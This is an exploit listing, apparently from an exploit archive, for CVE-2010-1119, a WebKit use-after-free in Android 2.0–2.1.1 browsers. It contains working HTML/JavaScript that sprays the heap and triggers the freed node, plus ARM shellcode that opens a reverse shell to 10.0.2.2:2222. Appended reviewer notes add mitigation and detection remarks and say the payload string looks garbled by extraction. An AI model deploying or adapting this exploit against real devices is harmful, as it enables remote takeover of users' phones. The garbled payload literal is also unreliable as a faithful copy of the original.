
Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

Posted on 15 March 2011

<html>
<!--
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell.
The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->
<!--
Reviewer notes (defensive):
* This is the public proof of concept for CVE-2010-1119 on the Android
  releases listed above. The payload connects back to the address fixed in
  the "Port" / "IP" comments inside the script (10.0.2.2:2222), presumably
  chosen for emulator testing; as written it reaches only that endpoint.
* Mitigation: the listed releases (2.0, 2.1, 2.1.1) are long end of life and
  the defect is fixed in later WebKit/Android builds; confirm the exact fix
  version against the vendor advisory for CVE-2010-1119 before relying on it.
* Detection: the spray pattern is visible in the markup itself: several
  hundred document.write calls of large unescape()-built strings with no
  user-visible content. Script inspection or content filtering can key on
  that shape rather than on the specific bytes.
* The listing as rendered on this page appears to have been garbled by
  extraction (for example the "\n" escape in the middle of the long string
  literal); it is kept byte for byte as reference material, and the payload
  bytes are reproduced unchanged with no claim made here about them beyond
  the author's own inline comments.
* Markup notes: the "language" attribute on <script> and the inline
  "onload" handler are obsolete/non-CSP-friendly forms, retained as in the
  original listing.
-->
<head>
<script language="JavaScript">
// Entry point, invoked from the body's onload handler.
// Detaches the target paragraph, drops a child of its "id" attribute node while
// keeping a reference to that child list, then (after a timer) fills the
// document with large strings and touches the retained node again.
function heap() {
  var id = document.getElementById("target");
  var attribute = id.getAttributeNode('id');
  // NOTE: assigned without "var", so "nodes" becomes an implicit global; the
  // timer callback below reads it after the removals.
  nodes = attribute.childNodes;
  document.body.removeChild(id);
  attribute.removeChild(nodes[0]);
  setTimeout(function() {
    // Allocates 70000 short String objects before the spray loop.
    for (var i = 0; i < 70000; i++) {var s = new String(unescape("u0058u0058")); };
    var scode = unescape("u0060u0060");
    var scode2 = unescape("u5005ue1a0");
    // Payload string; reproduced unchanged from the listing. The "\n" escape in
    // the middle of the literal is presumably an extraction artifact of a
    // wrapped line (TODO confirm against the original listing).
    var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0\nu708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002");
    shell += unescape("uae08"); // Port = 2222
    shell += unescape("u000au0202"); // IP = 10.0.2.2
    shell += unescape("u2000u2000"); // string terminate
    // Doubles both buffers until scode is longer than 0x1000 characters.
    do {
      scode += scode;
      scode2 += scode2;
    } while (scode.length<=0x1000);
    // Semicolon omitted in the original; relies on automatic semicolon insertion.
    scode2 += shell
    // NOTE: "target" and the loop index "i" are also implicit globals here.
    target = new Array();
    // Writes 300 blocks into the document: scode for i < 130, scode2 for
    // i > 130. Neither test matches i == 130, so target[130] is written as
    // undefined. The bare property read at the end of the loop is the access
    // to the node list retained above.
    for(i = 0; i < 300; i++){
      if (i<130){ target[i] = scode;}
      if (i>130){ target[i] = scode2;}
      document.write(target[i]);
      document.write("<br />");
      if (i>250){
        // alert("freeze");
        nodes[0].textContent
      }
    }
  }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

